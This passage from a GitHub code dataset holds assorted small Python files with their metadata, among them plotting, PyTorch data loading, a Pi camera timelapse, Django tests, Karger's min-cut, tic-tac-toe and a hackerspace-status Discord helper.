matplotlib.dates as mdates\nimport sys\n\n\ndef plot_day(start_date):\n    # database\n    db = database.Database()\n\n    # retrieve x and y values\n    x, y = db.get_data(start_date, 'txs_hour')\n\n    # plot labels appearance\n    plt.plot(x, y)\n    plt.xlabel('time in [UTC]')\n    plt.ylabel('transactions/hour')\n    plt.grid()\n\n    # Set x axis to hours %H:%M\n    hours = mdates.HourLocator()\n    t_fmt = mdates.DateFormatter('%H:%M')\n    plt.gca().xaxis.set_major_locator(hours)\n    plt.gca().xaxis.set_major_formatter(t_fmt)\n    plt.xlim([x[0], x[len(x)-1]])\n    plt.xticks(rotation=45)\n    plt.tight_layout()\n\n    # Save the figure before showing it; calling savefig after show() writes a blank file\n    plt.savefig('myfig')\n    plt.show()\n\n\nif __name__ == '__main__':\n    try:\n        date = sys.argv[1]\n        plot_day(date)\n    except Exception as e:\n        print(e)\n        print('Requires 1 argument: ')\n        print('Example: python plot.py 2018-07-06')\n","repo_name":"amosbastian/steempy-tutorials","sub_path":"part_27/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30078246738","text":"# coding:utf8\nimport torch\nfrom torch.utils import data\nimport numpy as np\nimport h5py\n\n\ndef create_collate_fn(pad_index, max_seq_len):\n    def collate_fn(dataset):\n        ground_truth = {}\n        tmp = []\n        for fn, caps, 
fc_feat, att_feat in dataset:\n ground_truth[fn] = [c[:max_seq_len] for c in caps]\n for cap in caps:\n tmp.append([fn, cap, fc_feat, att_feat])\n dataset = tmp\n dataset.sort(key=lambda p: len(p[1]), reverse=True)\n fns, caps, fc_feats, att_feats = zip(*dataset)\n fc_feats = torch.FloatTensor(np.array(fc_feats))\n att_feats = torch.FloatTensor(np.array(att_feats))\n\n lengths = [min(len(c), max_seq_len) for c in caps]\n caps_tensor = torch.LongTensor(len(caps), max(lengths)).fill_(pad_index)\n for i, c in enumerate(caps):\n end_cap = lengths[i]\n caps_tensor[i, :end_cap] = torch.LongTensor(c[:end_cap])\n lengths = [l-1 for l in lengths]\n return fns, fc_feats, att_feats, (caps_tensor, lengths), ground_truth\n\n return collate_fn\n\n\nclass CaptionDataset(data.Dataset):\n def __init__(self, fc_feats, att_feats, img_captions):\n self.fc_feats = fc_feats\n self.att_feats = att_feats\n self.captions = list(img_captions.items())\n\n def __getitem__(self, index):\n fn, caps = self.captions[index]\n f_fc = h5py.File(self.fc_feats, 'r')\n f_att = h5py.File(self.att_feats, 'r')\n fc_feat = f_fc[fn][:]\n att_feat = f_att[fn][:]\n return fn, caps, np.array(fc_feat), np.array(att_feat)\n\n def __len__(self):\n return len(self.captions)\n\n\ndef get_dataloader(fc_feats, att_feats, img_captions, pad_index, max_seq_len, batch_size, num_workers=0, shuffle=True):\n dataset = CaptionDataset(fc_feats, att_feats, img_captions)\n dataloader = data.DataLoader(dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=create_collate_fn(pad_index, max_seq_len + 1))\n return dataloader\n","repo_name":"ezeli/BUTD_model","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"28128335516","text":"# https://www.raspberrypi.org/learning/getting-started-with-picamera/worksheet/\n\nfrom picamera import PiCamera\nfrom time import sleep, time\nimport datetime\n\nFREQUENCY = 30 # timelapse frequency, in seconds\nFOLDER = \"/home/pi/photos\" # Folder to store photos\n\ncamera = PiCamera()\n# Suggested settings\ncamera.resolution = (3032, 2008) # 6mpx\ncamera.resolution = (2560, 1920) #5mpx\ncamera.framerate = 15\n\ncamera.start_preview()\nsleep(2) # Sleep 2 additional seconds to give time to start\n\nwhile True:\n # Sample: A picture will be saved in $FOLDER/picture17-03-18_17:34.jpg\n timestamp = datetime.datetime.now().strftime('%y-%m-%d_%H:%M:%S')\n picture = '{}/picture{}.jpg'.format(FOLDER,timestamp)\n print(\"Take picture {}\".format(picture))\n camera.capture(picture)\n sleep(FREQUENCY)\n\ncamera.stop_preview()\n","repo_name":"rephus/wearable-camera","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18618615234","text":"# import numpy as np\nfrom casadi import *\nimport do_mpc\n\ndef aircraft_simulator(model, delta_t):\n simulator = do_mpc.simulator.Simulator(model)\n simulator.set_param(t_step = delta_t)\n simulator.setup()\n\n return simulator","repo_name":"cyphyhouse/Aircraft_Landing_Verification","sub_path":"landing_devel/aircraft_simulator.py","file_name":"aircraft_simulator.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25442491730","text":"import dataclasses\nfrom 
unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport lobotomy\nfrom pytest import mark\n\nfrom manager import _runner\nfrom manager import _types\nfrom manager.tests import _utils\n\nCAPACITY_SCENARIOS = (\n {\"desired\": 4, \"fleet\": 2, \"node\": 2},\n {\"desired\": 0, \"fleet\": 0, \"node\": 0},\n {\"desired\": 0, \"fleet\": 0, \"node\": 2},\n {\"desired\": 0, \"fleet\": 2, \"node\": 0},\n {\"desired\": 2, \"fleet\": 1, \"node\": 3},\n)\n\n\n@mark.parametrize(\"scenario\", CAPACITY_SCENARIOS)\n@lobotomy.patch()\n@patch(\"manager._expander.grow_fleet\")\n@patch(\"manager._contractor.shrink_fleet\")\n@patch(\"manager._controller.get_nodes\")\n@patch(\"manager._controller.get_fleet\")\ndef test_update_fleet(\n get_fleet: MagicMock,\n get_nodes: MagicMock,\n shrink_fleet: MagicMock,\n grow_fleet: MagicMock,\n lobotomized: lobotomy.Lobotomy,\n scenario: dict,\n):\n \"\"\"Should update the fleet by calling the shrink and grow functions.\"\"\"\n configs = _types.ManagerConfigs()\n configs.fleets.append(\n _types.FleetRequirements(\n configs=configs,\n sector=\"primary\",\n size_spec=_types.SMALL_MEMORY_SPEC,\n )\n )\n\n get_fleet.return_value = _utils.make_fleet(\n requirements=configs.fleets[0],\n capacity=scenario[\"fleet\"],\n )\n\n node = _utils.make_fleet_node(\"a\", configs.fleets[0])\n indexes = list(range(scenario[\"node\"]))\n get_nodes.return_value = {\n **{f\"a{i}\": node for i in indexes},\n # These nodes should be filtered out because they don't meet the\n # criteria for inclusion in the fleet capacity calculation.\n **{f\"b{i}\": dataclasses.replace(node, state=\"foo\") for i in indexes},\n **{\n f\"c{i}\": dataclasses.replace(node, requirements=configs.fleets[0])\n for i in indexes\n },\n }\n\n _runner._update_fleet(\n configs=configs,\n fleet_requirements=configs.fleets[0],\n desired_capacity=scenario[\"desired\"],\n )\n","repo_name":"rocketboosters/kluster-fleet-manager","sub_path":"manager/tests/_manager/test_update_fleet.py","file_name":"test_update_fleet.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8837858694","text":"from scipy.stats import pearsonr\nimport matplotlib.pyplot as plt\n\n\nfig_2d = plt.figure()\nax = fig_2d.add_subplot(131)\n\nx = [10, 50, 30, 70, 80, 60, 90, 40, 10, 20, 30, 50, 60]\ny = [4, 5, 2, 6, 6, 8, 7, 2, 7, 3, 5, 1, 3]\n\nax.scatter(x, y, c='g', marker='o')\n\nax.set_xlabel('Zeitdauer X (in Minuten)')\nax.set_ylabel('Aggressivitätsmaß Y')\n\nr_xy, _ = pearsonr(x, y)\nprint('Korrelationskoeffizienten: %.3f\\n' % r_xy)\n\nx_boys = [x[idx] for idx in range(7)]\ny_boys = [y[idx] for idx in range(7)]\n\nax_boys = fig_2d.add_subplot(132)\nax_boys.scatter(x_boys, y_boys, c='b', marker='o')\n\nax_boys.set_xlabel('Zeitdauer X (in Minuten)')\nax_boys.set_ylabel('Aggressivitätsmaß Y')\nax_boys.set_title('Jungen')\n\nr_xy_boys, _ = pearsonr(x_boys, y_boys)\nprint('Korrelationskoeffizienten Jungen: %.3f\\n' % r_xy_boys)\n\nx_girls = [x[idx] for idx in range(7, 13)]\ny_girls = [y[idx] for idx in range(7, 13)]\n\nax_girls = fig_2d.add_subplot(133)\nax_girls.scatter(x_girls, y_girls, c='r', marker='o')\n\nax_girls.set_xlabel('Zeitdauer X (in Minuten)')\nax_girls.set_ylabel('Aggressivitätsmaß Y')\nax_girls.set_title('Mädchen')\n\nr_xy_girls, _ = pearsonr(x_girls, y_girls)\nprint('Korrelationskoeffizienten Mädchen: %.3f\\n' % 
r_xy_girls)\n\nplt.show()\n","repo_name":"vladb99/htwg","sub_path":"S2/STO/Python/aufgabe19.py","file_name":"aufgabe19.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23763011750","text":"from restclients_core.exceptions import DataFailureException\nfrom uw_kws.dao import KWS_DAO\nfrom uw_kws.models import Key\nimport json\n\nENCRYPTION_KEY_URL = \"/key/v1/encryption/{}.json\"\nENCRYPTION_CURRENT_KEY_URL = \"/key/v1/type/{}/encryption/current.json\"\n\n\nclass KWS(object):\n    \"\"\"\n    The KWS object has methods for getting key information.\n    \"\"\"\n    def _get_resource(self, url, headers={}):\n        headers[\"Accept\"] = \"application/json\"\n\n        response = KWS_DAO().getURL(url, headers)\n\n        if response.status != 200:\n            raise DataFailureException(url, response.status, response.data)\n\n        return json.loads(response.data)\n\n    def get_key(self, key_id=None, url=None):\n        \"\"\"\n        Returns a restclients.Key object for the given key ID or URL. If the\n        key isn't found, or if there is an error communicating with the\n        KWS, a DataFailureException will be thrown.\n        \"\"\"\n        if key_id is not None:\n            url = ENCRYPTION_KEY_URL.format(key_id)\n        elif url is None:\n            raise TypeError('URL is None')\n        return Key.from_json(self._get_resource(url))\n\n    def get_current_key(self, resource_name):\n        \"\"\"\n        Returns a restclients.Key object for the given resource. If the\n        resource isn't found, or if there is an error communicating with the\n        KWS, a DataFailureException will be thrown.\n        \"\"\"\n        url = ENCRYPTION_CURRENT_KEY_URL.format(resource_name)\n        return Key.from_json(self._get_resource(url))\n","repo_name":"uw-it-aca/uw-restclients-kws","sub_path":"uw_kws/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71479752107","text":"from django.test import TestCase\nfrom .models import PeriodData\n\n# Create your tests here.\nclass ModelTest(TestCase):\n\n    def test_create_cycle(self):\n        period_data = PeriodData.objects.create(\n            last_period = \"2020-06-20\",\n            cycle_average = 25,\n            period_average = 5,\n            start_date = \"2020-07-25\",\n            end_date = \"2021-07-25\"\n        )\n        period_data.save()\n\n        self.assertEqual(str(period_data.last_period), \"2020-06-20\")\n\n\n","repo_name":"gerald-x/womans-period","sub_path":"periodapi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14434333686","text":"def number_of_symb_in_line():\n    with open('referat.txt', 'r', encoding='utf-8') as r:\n        i = 0\n        for str in r:\n            i += 1\n            str = str.replace(\"\\n\", \"\")\n            print(\"Количество символов в {} строке: \".format(i), len(str))\n\n\ndef number_of_symb_in_text():\n    with open('referat.txt', 'r', encoding='utf-8') as r:\n        content = r.read().replace(\"\\n\", \"\")\n        print(\"Количество символов всего текста: \", len(content))\n\n\ndef number_of_words_in_text():\n    with open('referat.txt', 'r', encoding='utf-8') as r:\n        content = r.read().replace(\"\\n\", \"\").split()\n        print(\"Количество слов в тексте: \", len(content))\n\n\ndef create_new_file():\n    with open('referat.txt', 'r', encoding='utf-8') as r:\n        content = r.read().replace(\".\", \"!\")\n\n    with open('referat2.txt', 'w', encoding='utf-8') as w:\n        w.write(content)\n    print(\"Создан новый файл referat2.txt, где вместо точек 
стоит воскл.знак\")\n\n\nnumber_of_symb_in_line()\nnumber_of_symb_in_text()\nnumber_of_words_in_text()\ncreate_new_file()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Vlad-Bryu/Home_work","sub_path":"learn3/files1task.py","file_name":"files1task.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21133200343","text":"\r\ndef writeFile():\r\n inputNama = input(\"Masukkan Nama mu: \")\r\n inputUmur = input(\"Masukkan Umur mu: \")\r\n inputAlamat = input(\"Masukkan Alamatmu: \")\r\n inputEmail = input(\"Masukkan Emailmu: \")\r\n inputDosen = input(\"Masukkan Dosen Walimu: \")\r\n \r\n fileWrite = open(\"Biodata.txt\", \"w\")\r\n fileWrite.write(\"Nama: \" + inputNama + \"\\nUmur: \" + inputUmur + \"\\nAlamat: \" + inputAlamat + \"\\nEmail: \" + inputEmail + \"\\nDosen Wali: \" + inputDosen)\r\n fileWrite.close()\r\n\r\ndef readFile():\r\n fileRead = open(\"Biodata.txt\", \"r\")\r\n text = fileRead.read()\r\n print(\"Berikut Ini Data Kamu\")\r\n print(text)\r\n fileRead.close()\r\n\r\nwriteFile()\r\nprint(\"\\n\")\r\nreadFile()","repo_name":"Virester/modul-9","sub_path":"Modul 9 - Latihan 1.py","file_name":"Modul 9 - Latihan 1.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19911111820","text":"print('*' * 10, \" Крестики-нолики v.1.0\", '*' * 10)\n\nboard = list(range(1, 10))\n\n\ndef draw_board(board): # создаем функцию для игрового поля\n print('-' * 13)\n for i in range(3):\n print('|', board[0 + i * 3], '|', board[1 + i * 3], '|', board[2 + i * 3], '|') # создаем 9 ячеек для игры\n print('-' * 13)\n\n\ndef take_input(player_token): # функция принимает ввод пользоваетля\n valid = False\n while not valid:\n player_answer = input(\"Куда поставим:\" + player_token + \"?\")\n try:\n player_answer = int(player_answer)\n except:\n print(\"Некорректный ввод. 
Вы уверены, что ввели число?\")\n continue\n if player_answer >= 1 and player_answer <= 9:\n if str(board[\n player_answer - 1]) not in \"X0\": # Проверка когда клетка занята или введино число не из диапазона от 1 до 9\n board[player_answer - 1] = player_token\n valid = True\n else:\n print(\"Эта клетка уже занята\")\n else:\n print(\"Введите число то 1 до 9\")\n\n\ndef check_win(board): # функция проверяет выиграл ли игрок\n win_cord = ((0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8),\n (2, 4, 6)) # зоздаем кортеж с выиграшными вариантами\n for e in win_cord:\n if board[e[0]] == board[e[1]] == board[e[2]]:\n return board[e[0]]\n return False\n\n\ndef main(board): # собираем все вместе\n counter = 0\n win = False\n while not win:\n draw_board(board)\n if counter % 2 == 0:\n take_input(\"X\")\n else:\n take_input(\"0\")\n counter += 1\n if counter > 4:\n tmp = check_win(board)\n if tmp:\n print(tmp, \"Ты выиграл!\")\n win = True\n break\n if counter == 9:\n print(\"Ничья\")\n break\n draw_board(board)\n\n\nmain(board)\n","repo_name":"maximbabaiev/Education-at-IT-STEP-Academy","sub_path":"ItBasic/06_Module/19_Lesson/Homework/крестики нолики.py","file_name":"крестики нолики.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72983412908","text":"import copy\nimport random\nimport numpy as np\nfrom tqdm import tqdm\n\ndef karger(graph):\n \"\"\"\n randomized contraction algorithm for the min cut problem\n \"\"\"\n while len(graph) > 2:\n i = random.choice(list(graph.keys()))\n j = random.choice(graph[i])\n graph = contract(graph, i, j)\n return len(graph[i])\n\ndef contract(graph, i, j):\n \"\"\"\n contract 2 nodes\n \"\"\"\n neighbors = graph.pop(j)\n graph[i] += neighbors\n for k in graph:\n for l in range(len(graph[k])):\n if graph[k][l] == j:\n graph[k][l] = i\n graph[i] = list(filter(lambda x: x != i, graph[i]))\n return graph\n\n# load txt as graph\ngraph = {}\nwith open('./kargerMinCut.txt', 'r') as f:\n for line in f:\n temp = [int(i) for i in line.split()]\n # add adjacent list\n graph[temp[0]] = temp[1:]\n\n# run many times\nn = len(graph)\niters = 800\nmin = n ** 2\nprint('Begin {} times running...'.format(iters))\ntbar = tqdm(range(iters), ascii=True)\nfor _ in tbar:\n cuts = karger(copy.deepcopy(graph))\n if cuts < min:\n min = cuts\n tbar.set_description(\"Current Min Cut {}\".format(min))\n\nprint('Done!')\nprint('Mincut is', min)\n","repo_name":"LucasBoTang/Coursera_Algorithms","sub_path":"01Divide_and_Conquer_Sorting_and_Searching_and_Randomized_Algorithms/Assignment04/karger_min_cut.py","file_name":"karger_min_cut.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30129176418","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"wiki/edit_entry\", views.edit_entry, name= \"edit_entry\"),\n path(\"wiki/new_entry\", views.new_entry, name= \"new_entry\"),\n path(\"wiki/search_results\", views.search_results, name=\"search_results\"),\n path(\"wiki/random_entry\", views.random_entry, name= \"random_entry\"),\n path(\"wiki/\", views.entery, name= \"entery\"),\n]\n","repo_name":"mograby3500/wiki","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22837584336","text":"# ImageJ tools: ijt\n\nimport scyjava as sj\nfrom functools import lru_cache\n\n\nclass ImageProcess:\n \"\"\"For image processing functions. Note this class\n only supports ImgLib2 images.\n \"\"\"\n\n def __init__(self, ij_instance=None):\n self.ij = ij_instance\n\n def gauss_sub(self, image: \"net.imglib2.RandomAccessibleInterval\", sigma):\n \"\"\"Apply a guassian blur subtraction.\n \"\"\"\n\n self._check_ij_gateway()\n img = self.ij.op().convert().int32(image)\n img_g = self.ij.op().filter().gauss(img, sigma)\n return img_g - img\n\n def gauss_sub_stack(self, stack, sigma: float):\n stack = self.ij.op().convert().int32(stack)\n gauss_slices = []\n for i in range(stack.shape[2]):\n s = self.ij.py.to_dataset(stack[:, :, i])\n s_g = self.ij.op().filter().gauss(s, sigma)\n s_gs = s - s_g\n gauss_slices.append(s_gs)\n return _Views().stack(*gauss_slices)\n\n def invert(self, image: \"net.imglib2.RandomAccessibleInterval\"):\n if self.ij == None:\n self._get_imagej_gateway()\n\n image_i = self.ij.dataset().create(image)\n self.ij.op().run(\"image.invert\", image_i, image)\n return image_i\n\n def _check_ij_gateway(self):\n if self.ij == None:\n self._get_imagej_gateway()\n\n def _get_imagej_gateway(self):\n try:\n from imagej import ij\n\n self.ij = ij\n except ImportError:\n print(f\"PyImageJ has not been initialized.\")\n\n\nclass Deconvolution:\n \"\"\"Deconvolve an image with ImageJ Ops implementation of Richardson Lucy.\n\n :param iterations: Number of iterations (defualt=30)\n :param numerical_aperture: Numerical aperture of the objective used (default=0.75)\n :param wavelength: Wavelength in nm used in the image (default=550)\n :param particle_pos: Position of the particle (positive value in nm) relative to the coverlsip (0)\n \"\"\"\n\n def __init__(\n self,\n iterations=30,\n numerical_aperture=0.75,\n wavelength=550,\n lateral_res=100,\n axial_res=100,\n particle_pos=2000,\n reg_factor=0.01,\n ri_immersion=1.5,\n ri_sample=1.4,\n psf=None,\n ij_instance=None,\n ):\n self.iterations = iterations\n self.numerical_aperture = numerical_aperture\n self.wavelength = wavelength * 1e-9\n self.lateral_res = lateral_res * 1e-9\n self.axial_res = axial_res * 1e-9\n self.particle_pos = particle_pos * 1e-9\n self.reg_factor = reg_factor\n self.ri_immersion = ri_immersion\n self.ri_sample = ri_sample\n self.ij = ij_instance\n self.psf = psf\n\n def get_config(self):\n \"\"\"Return the current configuration for deconvolution\"\"\"\n print(\"\\nDeconvolution configuration\")\n print(f\"\\tIterations: {self.iterations}\")\n print(f\"\\tNumerical Aperture: {self.numerical_aperture}\")\n print(f\"\\tWavelength: {self.wavelength / 1e-9} nm\")\n print(f\"\\tLateral resolution: {self.lateral_res / 1e-9} nm\")\n print(f\"\\tAxial resolution: {self.axial_res / 1e-9} nm\")\n print(f\"\\tParticle position: {round(self.particle_pos / 
1e-9)} nm\")\n print(f\"\\tRi Immersion: {self.ri_immersion}\")\n print(f\"\\tRi Sample: {self.ri_sample}\")\n print(f\"\\tReg factor: {self.reg_factor}\")\n if self.psf == None:\n print(f\"\\tPSF: synthetic (default)\\n\")\n else:\n print(f\"{self.psf}\\n\")\n\n\n def get_iterations(self):\n return self.iterations\n\n def set_iterations(self, iterations):\n self.iterations = iterations\n\n def get_numerical_aperture(self):\n return self.numerical_aperture\n\n def set_numerical_aperture(self, numerical_aperture):\n self.numerical_aperture = numerical_aperture\n\n def get_wavelength(self):\n return self.wavelength\n\n def set_wavelength(self, wavelength):\n self.get_wavelength = wavelength * 1e-9\n\n def get_lateral_res(self):\n return self.lateral_res\n\n def set_lateral_res(self, lateral_res):\n self.lateral_res = lateral_res * 1e-9\n\n def get_axial_res(self):\n return self.axial_res\n\n def set_axial_res(self, axial_res):\n self.axial_res = axial_res * 1e-9\n\n def get_particle_pos(self):\n return self.particle_pos\n\n def set_particle_pos(self, particle_pos):\n self.particle_pos = particle_pos * 1e-9\n\n def get_ri_immersion(self):\n return self.ri_immersion\n\n def set_ri_immersion(self, ri_immersion):\n self.ri_immersion = ri_immersion\n\n def get_ri_sample(self):\n return self.ri_sample\n\n def set_ri_sample(self, ri_sample):\n self.ri_sample = ri_sample\n\n def get_reg_factor(self):\n return self.reg_factor\n\n def set_reg_factor(self, reg_factor):\n self.reg_factor = reg_factor\n\n def get_psf(self):\n return self.psf\n\n def set_psf(self, psf):\n self.psf = psf\n\n def deconvolve(self, image: \"net.imglib2.RandomAccessibleInterval\", psf=None):\n \"\"\"Deconvolve images\"\"\"\n if self.ij == None:\n self._get_imagej_gateway()\n\n # convert image to float\n image_f = self.ij.op().convert().float32(image)\n\n # create synthetic PSF if none supplied.\n if self.psf == None:\n self.create_synthetic_psf(image)\n\n # deconvolve image\n image_decon = self.ij.op().namespace(_CreateNamespace()).img(image_f)\n self.ij.op().deconvolve().richardsonLucyTV(\n image_decon, image_f, self.psf, self.iterations, self.reg_factor\n )\n\n return image_decon\n\n def create_synthetic_psf(self, image: \"net.imglib2.RandomAccessibleInterval\"):\n \"\"\"Create a synthetic PSF.\"\"\"\n if self.ij == None:\n self._get_imagej_gateway()\n\n psf_dims = []\n for i in range(len(image.shape)):\n psf_dims.append(image.dimension(i))\n\n psf_size = _FinalDimensions()(psf_dims)\n psf = (\n self.ij.op()\n .namespace(_CreateNamespace())\n .kernelDiffraction(\n psf_size,\n self.numerical_aperture,\n self.wavelength,\n self.ri_sample,\n self.ri_immersion,\n self.lateral_res,\n self.axial_res,\n self.particle_pos,\n _FloatType()(),\n )\n )\n\n self.psf = psf\n\n def _get_imagej_gateway(self):\n try:\n from imagej import ij\n\n self.ij = ij\n except ImportError:\n print(f\"PyImageJ has not been initialized.\")\n\n\ndef image_conversion_check(imagej_instance):\n \"\"\"\n Test ImageJ/ImgLib2 image conversions.\n \"\"\"\n # get image classes\n ImagePlus = sj.jimport(\"ij.ImagePlus\")\n Dataset = sj.jimport(\"net.imagej.Dataset\")\n ImgPlus = sj.jimport(\"net.imagej.ImgPlus\")\n Img = sj.jimport(\"net.imglib2.img.Img\")\n RandomAccessibleInterval = sj.jimport(\"net.imglib2.RandomAccessibleInterval\")\n\n # perform conversion checks\n image_classes = [Dataset, ImagePlus, ImgPlus, Img, RandomAccessibleInterval]\n for i in range(len(image_classes)):\n src_class = image_classes[i]\n dest_classes = image_classes.copy()\n 
dest_classes.remove(src_class)\n for j in range(len(dest_classes)):\n print(\n f\"{src_class} [--->] {dest_classes[j]}: {imagej_instance.convert().supports(src_class, dest_classes[j])}\"\n )\n\n\n@lru_cache\ndef _CreateNamespace():\n return sj.jimport(\"net.imagej.ops.create.CreateNamespace\")\n\n\n@lru_cache\ndef _FinalDimensions():\n return sj.jimport(\"net.imglib2.FinalDimensions\")\n\n\n@lru_cache\ndef _FloatType():\n return sj.jimport(\"net.imglib2.type.numeric.real.FloatType\")\n\n@lru_cache\ndef _Views():\n return sj.jimport(\"net.imglib2.view.Views\")\n","repo_name":"elevans/tooled","sub_path":"src/tooled/ijt.py","file_name":"ijt.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18460136742","text":"import pygame\nimport os\nimport random\n\nclass Fireball(pygame.sprite.Sprite):\n def __init__(self, x, y, right):\n super(Fireball, self).__init__()\n self.x : int = x\n self.y : int = y\n self.right : bool = right\n self.lateral_speed : int = 8\n self.width : int = 40\n self.height : int = 30\n \n \n self.image = pygame.image.load(\"./dragon/fireball/Fire_Attack4.png\")\n if not self.right:\n self.image = pygame.transform.flip(self.image, True, False)\n \n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n\n def move(self) -> None:\n if self.right:\n self.x += self.lateral_speed\n else:\n self.x -= self.lateral_speed\n \n def coordinates(self) :\n if not self.right:\n return self.x + 15, self.y, 30, self.height\n return self.x, self.y, 30, self.height\n \n def update(self):\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n","repo_name":"DrakeCullen/AdvPy-dpcullen","sub_path":"dragon_slayer/fireball.py","file_name":"fireball.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73823244907","text":"from itertools import permutations\n\n# 소수 판별 함수\ndef is_prime(num):\n if num < 2:\n return False\n for i in range(2, int(num**0.5) + 1):\n if num % i == 0:\n return False\n return True\n\ndef solution(numbers):\n answer = 0\n all_combinations = set()\n\n # 가능한 모든 숫자 조합 생성\n for i in range(1, len(numbers) + 1):\n permutations_list = permutations(numbers, i)\n for perm in permutations_list:\n num = int(\"\".join(perm))\n all_combinations.add(num)\n\n # 각 숫자 조합이 소수인지 확인\n for num in all_combinations:\n if is_prime(num):\n answer += 1\n\n return answer","repo_name":"gns0314/codestudy","sub_path":"프로그래머스/lv2/42839. 
소수 찾기/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3030961169","text":"import redis\nimport requests\nimport json\n\ndb = 'localhost'\ndb_port = 6379\n\n\ndef voice_name_edit(channel_id, name):\n    r = redis.Redis(host=db, port=db_port, db=2)\n    r.set(channel_id, name)\n\n\nurl = \"https://vsza.hu/hacksense/status.json\"\nheaders = {\"User-Agent\": \"aRandomUserAgenttoMakeTheApiHappy\"}\nresponse = requests.get(url, headers=headers)\ndata = json.loads(response.content.decode('utf-8'))\n\ncache = redis.Redis(host=db, port=db_port, db=3)\n\ncached = cache.get(\"hacksense\")\n\n# guard against the first run, when the cache key does not exist yet\nif cached is None or str(data['what']) != cached.decode('utf-8'):\n    state = str(data['what'])\n    cache.set('hacksense', state)\n    if data['what'] == True:\n        voice_name_edit('998622942957150301','space-is-OPEN')\n    else:\n        voice_name_edit('998622942957150301','space-is-CLOSED')\n\n\n\n# the channel edits pulled from db, by crow bot\n#@tasks.loop(seconds=30)\n#async def edit_vchannel_name():\n#    r = redis.Redis(host=db, port=db_port, db=2)\n#    for key in r.keys('*'):\n#        cahnnel_id = key.decode(\"utf-8\")\n#        channel = client.get_channel(int(cahnnel_id))\n#        await discord.VoiceChannel.edit(channel, name = r.getdel(key).decode(\"utf-8\"))","repo_name":"GeriTheFox/HSBP-hacksense_Discords_status","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9967026640","text":"\"\"\"\n1903. Largest Odd Number in String\nYou are given a string num, representing a large integer.\nReturn the largest-valued odd integer (as a string)\nthat is a non-empty substring of num,\nor an empty string \"\" if no odd integer exists.\nA substring is a contiguous sequence of characters within a string.\nExample 1:\nInput: num = \"52\"\nOutput: \"5\"\nExplanation: The only non-empty substrings are \"5\", \"2\", and \"52\". \"5\" is the only odd number.\nExample 2:\nInput: num = \"4206\"\nOutput: \"\"\nExplanation: There are no odd numbers in \"4206\".\nExample 3:\nInput: num = \"35427\"\nOutput: \"35427\"\nExplanation: \"35427\" is already an odd number.\n\n\"\"\"\n\nclass Solution:\n    def largestOddNumber(self, num: str) -> str:\n        # the largest odd substring is the longest prefix that ends in an\n        # odd digit, so scan from the right for the last odd digit\n        for i in range(len(num) - 1, -1, -1):\n            if int(num[i]) % 2 != 0:\n                return num[:i + 1]\n        return \"\"\n\n\n# num = \"52\"\nnum = \"4206\"\n# num = \"35427\"\ns1=Solution()\nprint(s1.largestOddNumber(num))","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_21_jan_2022/leetcode_1903_Largest_Odd_Number_in_String.py","file_name":"leetcode_1903_Largest_Odd_Number_in_String.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73695729388","text":"from django.urls import path\nfrom . 
